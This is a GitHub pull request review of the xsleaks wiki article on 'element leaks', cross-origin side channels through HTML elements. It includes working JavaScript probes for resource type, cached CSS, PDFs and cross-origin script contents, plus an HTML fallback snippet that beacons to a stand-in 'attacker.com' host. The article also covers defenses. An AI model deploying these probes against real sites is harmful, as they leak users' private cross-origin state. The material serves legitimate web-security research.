Element leaks (#109)
xsleaks/wiki: content/docs/attacks/element-leaks.md

+++
title = "Element leaks"
description = ""
category = "Attack"
abuse = [
    "HTMLElement",
]
defenses = [
    "SameSite Cookies"
]
menu = "main"
weight = 2
+++

Some HTML Elements leak data cross origin.

> 

Reviewer: ```suggestion
For example, the below media resources can leak information about its size, duration, type. 

```

- [HTMLMediaElement](https://developer.mozilla.org/en-US/docs/Web/API/HTMLMediaElement) leaks the media `duration` and the `buffered` times.
- [HTMLVideoElement](https://developer.mozilla.org/en-US/docs/Web/API/HTMLVideoElement) leaks the `videoHeight` and `videoWidth` 
  some browsers may also have `webkitVideoDecodedByteCount`, `webkitAudioDecodedByteCount` and `webkitDecodedFrameCount`
- [getVideoPlaybackQuality()](https://developer.mozilla.org/en-US/docs/Web/API/VideoPlaybackQuality) leaks the `totalVideoFrames`.
- [HTMLImageElement](https://developer.mozilla.org/en-US/docs/Web/API/HTMLImageElement) leaks the `height` and `width` but if the image is invalid they will be 0 

>   and [decode()](https://developer.mozilla.org/en-US/docs/Web/API/HTMLImageElement/decode) will get rejected.

Reviewer: ```suggestion
  and [`image.decode()`](https://developer.mozilla.org/en-US/docs/Web/API/HTMLImageElement/decode) will get rejected.
```

> Some HTML Elements have properties that predictability change when a valid resource is used this can be checked to detect what the resource type is.

Reviewer: ```suggestion
It's possible to differentiate between media types via unique property for a given media type. For example, it is `videoWidth` for a `<video>`, or `duration` for an `<audio>`. The below snippet shows an example code that returns the type of a resource. 
```

```javascript
async function getType(url) {
    // Detect if resource is audio or video
    let media = document.createElement("video");
    media.src = url;
    await new Promise(r=>setTimeout(r,50));
    if (media.videoWidth) {
    return "video";
    } else if (media.duration) {
    return "audio"
    }
    // Detect if resource is an image
    let image = new Image();
    image.src = url;
    await new Promise(r=>setTimeout(r,50));
    if (image.width) return "image";
}
```

## Abusing CORB
[CORB]({{< ref "/docs/attacks/browser-features/corb.md" >}}) is a feature of Chrome that makes responses empty if the wrong content type is used.
This means that if the type is wrong it’s not cached.

> An ifCached function can be found at [Cache Probing]({{< ref "/docs/attacks/cache-probing.md" >}})

Reviewer: ```suggestion
An `ifCached` function can be found in [Cache Probing]({{< ref "/docs/attacks/cache-probing.md" >}}) article.
```

```javascript
async function isType(url, type = "script") {
  let error = false;
  // Purge url
  await ifCached(url, true);
  // Attempt to load resource
  let e = document.createElement(type);
  e.onerror = () => error = true;
  e.src = url;
  document.head.appendChild(e);
  // Wait for it to be cached if its allowed by CORB
  await new Promise(resolve => setTimeout(resolve, 500));
  // Cleanup
  document.head.removeChild(e);
  // Fix for "images" that get blocked differently.
  if (error) return false
  return ifCached(url);
}
```

## Abusing getComputedStyle

> [getComputedStyle](https://developer.mozilla.org/en-US/docs/Web/API/Window/getComputedStyle) can be used to leak CSS style sheets.  

Reviewer: ```suggestion
[getComputedStyle](https://developer.mozilla.org/en-US/docs/Web/API/Window/getComputedStyle) can be used to read an embedded to the current page CSS style sheets. Including those loaded from different origins. 
```

This function just checks if there has been a style applied to the body.
```javascript
async function isCSS(url) {
    let link = document.createElement('link');
    link.rel = 'stylesheet';
    link.type = 'text/css';
    link.href = url;
    let style1 = JSON.stringify(getComputedStyle(document.body));
    document.head.appendChild(link);
    await new Promise(resolve => setTimeout(resolve, 500));
    let style2 = JSON.stringify(getComputedStyle(document.body));
    document.head.removeChild(link);
    return (style1 !== style2);
}
```
## PDF
There are [Open URL Parameters](https://bugs.chromium.org/p/chromium/issues/detail?id=64309#c113) that allow some control over the content such as `zoom`, `view`, `page`, `toolbar`.  

> For chrome a PDF can be detected using [frame counting]({{< ref "/docs/attacks/frame-counting.md" >}}) because an `embed` is used internally.

Reviewer: ```suggestion
For chrome, a PDF can be detected with [frame counting]({{< ref "/docs/attacks/frame-counting.md" >}}) because an `embed` is used internally.
```

```javascript
async function isPDF(url) {
    let w = open(url);
    await new Promise(resolve => setTimeout(resolve, 500));
    let result = (w.length === 1);
    w.close();
    return result;
}
```
{{< hint warning  >}} There will be false positives if the page has other embeds. {{< /hint >}}

## Script tag

> Leaks the contents of a cross origin script during execution.  
> The contents of a function can be leaked using `.toString()` and variables may also be assigned to the `window`.  
> Even if the data is not accessible from the window it’s still possible to hook a function that it uses.  

Reviewer: ```suggestion
When a cross-origin script is included on a page it's not directly possible to read its contents. However, if a script uses any built-in functions, it's possible to overwrite them and read their arguments which might leak valuable information [^script-leaks].
```

Could be worth expanding on the `<script>` case and research `caller`, `callee`, `stack.trace`, more information can be leaked probably. But leave it for future PRs and merge this one finally.

```javascript
let hook = window.Array.prototype.push;
window.Array.prototype.push = function() {
    console.log(this);
    return hook.apply(this, arguments);
}
```

> {{< hint tip >}} A paper was made using this attack [link](https://www.usenix.org/system/files/conference/usenixsecurity15/sec15-paper-lekies.pdf) {{< /hint >}}

Reviewer: ```suggestion
```

## When Javascript can’t be used

> If the `error` event can’t be used [fallback content](https://html.spec.whatwg.org/multipage/dom.html#fallback-content) might be an alternative.  

Reviewer: ```suggestion
If JavaScript is disabled it's still possible to leak some information about cross-origin resources. For example `<object>` can be used to detect whether a resource responds with *Error Code*. What happens is that if a resource `//example.org/resource` returns an error in `<object data=//example.org/resource>fallback</object>` then `fallback` will be rendered [^fallback] [^leaky-images]. It's possible to inject another `<object>` inside that will leak the information outside, or detect it with CSS [^xsleaks-nojs].
```

> This sends a request to [example.org](https://example.org) when there's a 404 on [example.com](https://example.com).

Reviewer: ```suggestion
The below code embeds `//example.org/404` and if it responds with *Error* then a request to `//attacker.com/?error` is also made as a fallback.
```

```html

> <object data="https://example.com/404">
> <object data="https://example.org/?event=error"></object>
> </object>

Reviewer: ```suggestion
<object data="//example.com/404">
  <object data="//attacker.com/?error"></object>
</object>
```

```

## Defense

|       Attack Alternative        | [SameSite Cookies (Lax)]({{< ref "/docs/defenses/opt-in/same-site-cookies.md" >}}) | [COOP]({{< ref "/docs/defenses/opt-in/coop.md" >}}) | [Framing Protections]({{< ref "/docs/defenses/opt-in/xfo.md" >}}) |                                          [Isolation Policies]({{< ref "/docs/defenses/isolation-policies" >}})                                          |
| :-----------------------------: | :--------------------------------------------------------------------------------: | :-------------------------------------------------: | :---------------------------------------------------------------: | :-----------------------------------------------------------------------------------------------------------------------------------------------------: |

> |   Type leaks    |                                         ✔️                                          |                          ❌                          |                                 ❌                                 |                                                                                | |

Reviewer: ```suggestion
|   Type leaks    |                                         ✔️                                          |                          ❌                          |                                 ❌                                 |                                                                                | |

## References
[^script-leaks]: The Unexpected Dangers of Dynamic JavaScript. [link](https://www.usenix.org/system/files/conference/usenixsecurity15/sec15-paper-lekies.pdf) 
[^fallback]: HTML Standard, [3.2.5.2.6 Embedded content], [link](https://html.spec.whatwg.org/multipage/dom.html#fallback-content)
[^leaky-images]: Leaky Images: Targeted Privacy Attacks in the Web, [3.4 Linking User Identities], [link](https://www.usenix.org/system/files/sec19fall_staicu_prepub.pdf)
[^xsleaks-nojs]: [https://twitter.com/terjanq/status/1180477124861407234](https://twitter.com/terjanq/status/1180477124861407234)

```

Reviewer: @NDevTK can you integrate References section as well?

> |       Attack Alternative        | [SameSite Cookies (Lax)]({{< ref "/docs/defenses/opt-in/same-site-cookies.md" >}}) | [COOP]({{< ref "/docs/defenses/opt-in/coop.md" >}}) | [Framing Protections]({{< ref "/docs/defenses/opt-in/xfo.md" >}}) |                                          [Isolation Policies]({{< ref "/docs/defenses/isolation-policies" >}})                                          |
> | :-----------------------------: | :--------------------------------------------------------------------------------: | :-------------------------------------------------: | :---------------------------------------------------------------: | :-----------------------------------------------------------------------------------------------------------------------------------------------------: |
> |   Type leaks    |                                         ✔️                                          |                          ❌                          |                                 ❌                                 |                                                                                | |

Reviewer: ```suggestion
    | Attack Alternative | [SameSite Cookies (Lax)]({{< ref "/docs/defenses/opt-in/same-site-cookies.md" >}}) | [COOP]({{< ref "/docs/defenses/opt-in/coop.md" >}}) | [Framing Protections]({{< ref "/docs/defenses/opt-in/xfo.md" >}}) |                                          [Isolation Policies]({{< ref "/docs/defenses/isolation-policies" >}})                                           |
    | :----------------: | :--------------------------------------------------------------------------------: | :-------------------------------------------------: | :---------------------------------------------------------------: | :------------------------------------------------------------------------------------------------------------------------------------------------------: |
    |     Type leaks     |                                         ✔️                                         |                         ❌                          |                                ❌                                 | [RIP]({{< ref "/docs/defenses/isolation-policies/resource-isolation" >}}) 🔗 [NIP]({{< ref "/docs/defenses/isolation-policies/navigation-isolation" >}}) |

```
